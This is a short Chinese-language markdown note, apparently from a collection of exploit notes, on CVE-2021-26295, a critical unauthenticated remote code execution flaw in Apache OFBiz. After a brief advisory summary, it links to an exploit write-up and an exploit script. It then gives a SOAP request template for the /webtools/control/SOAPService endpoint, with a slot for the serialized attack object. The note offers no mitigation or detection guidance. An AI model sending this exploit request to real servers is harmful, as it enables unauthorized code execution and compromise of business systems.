CVE-2021-26295.md

955 B / 2021-07-04 19:32:24
    ## CVE-2021-26295

2021年03月22日，SecList发布了Apache OFBiz的风险通告，漏洞编号为CVE-2021-26295，漏洞等级：高危，漏洞评分：9.8。
OFBiz 是 Apache下属的企业ERP系统开发框架，该漏洞能允许未授权的远程攻击者直接在OFBiz服务器上执行任意代码。

## exp参考

- https://xz.aliyun.com/t/9345
- https://github.com/r0ckysec/CVE-2021-26295/blob/main/cve-2021-26295_exp.py

```
http://XXX/webtools/control/SOAPService

Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key>
            <cus-obj>{}</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>
```